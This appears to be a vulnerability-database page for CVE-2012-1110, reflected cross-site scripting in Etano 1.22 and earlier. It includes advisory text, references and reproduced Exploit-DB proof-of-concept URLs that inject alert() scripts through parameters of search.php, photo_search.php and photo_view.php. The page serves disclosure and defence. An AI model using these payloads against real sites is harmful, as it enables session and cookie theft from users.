CVE-2012-1110
Description
Multiple cross-site scripting (XSS) vulnerabilities in Etano 1.22 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) user, (2) email, (3) email2, (4) f17_zip, or (5) agree parameter to join.php; (6) PATH_INFO, (7) st, (8) f17_city, (9) f17_country, (10) f17_state, (11) f17_zip, (12) f19, (13) wphoto, (14) search, or (15) v parameter to search.php; (16) PATH_INFO or (17) st parameter to photo_search.php; or (18) return parameter to photo_view.php.
Predictions
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Etano 1.20/1.22 - 'photo_search.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/52295/info
Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected.
http://www.example.com/etano/photo_search.php?'";><script>alert(/XSS/)</script>
http://www.example.com/etano/photo_search.php?st='";><script>alert(/XSS/)</script>
Etano 1.20/1.22 - 'photo_view.php?return' Cross-Site Scripting
source: https://www.securityfocus.com/bid/52295/info
Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected.
http://www.example.com/etano/photo_view.php?photo_id=1&return=";><script>alert(/XSS/)</script>
Etano 1.20/1.22 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/52295/info
Etano is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Etano versions 1.20 to 1.22 are vulnerable; other versions may be affected.
http://www.example.com/etano/search.php?'";><script>alert(/XSS/)</script>
http://www.example.com/etano/search.php?st='";><script>alert(/XSS/)</script>
http://www.example.com/etano/search.php?f17_city='";><script>alert(/XSS/)</script>&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
http://www.example.com/etano/search.php?f17_city=0&f17_country='";><script>alert(/XSS/)</script>&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto=1
http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state='";><script>alert(/XSS/)</script>&f17_zip=3&f19=0&st=basic&wphoto=1
http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip='";><script>alert(/XSS/)</script>&f19=0&st=basic&wphoto=1
http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19='";><script>alert(/XSS/)</script>&st=basic&wphoto=1
http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st='";><script>alert(/XSS/)</script>&wphoto=1
http://www.example.com/etano/search.php?f17_city=0&f17_country=0&f17_state=0&f17_zip=3&f19=0&st=basic&wphoto='";><script>alert(/XSS/)</script>
http://www.example.com/etano/search.php?search='";><script>alert(/XSS/)</script>&v=g
http://www.example.com/etano/search.php?search=51d43831f5dde83a4eedb23895f165f6&v='";><script>alert(/XSS/)</script>
http://www.example.com/etano/search.php?st=xss";><script>alert(/XSS/)</script>&user=unknown
Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| datemill | etano | {"endIncluding":"1.22"} | |
References
- http://archives.neohapsis.com/archives/bugtraq/2012-03/0013.html
- http://secunia.com/advisories/48165
- http://www.openwall.com/lists/oss-security/2012/03/05/15
- http://www.openwall.com/lists/oss-security/2012/03/05/21
- http://www.osvdb.org/79827
- http://www.osvdb.org/79828
- http://www.osvdb.org/79829
- http://www.osvdb.org/79830
- http://www.securityfocus.com/bid/52295
- http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss
- https://exchange.xforce.ibmcloud.com/vulnerabilities/73669
- http://archives.neohapsis.com/archives/bugtraq/2012-03/0013.html
- http://secunia.com/advisories/48165
- http://www.openwall.com/lists/oss-security/2012/03/05/15
- http://www.openwall.com/lists/oss-security/2012/03/05/21
- http://www.osvdb.org/79827
- http://www.osvdb.org/79828
- http://www.osvdb.org/79829
- http://www.osvdb.org/79830
- http://www.securityfocus.com/bid/52295
- http://yehg.net/lab/pr0js/advisories/%5Betano_1.2.x%5D_xss
- https://exchange.xforce.ibmcloud.com/vulnerabilities/73669
CWEs
CWE-79
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.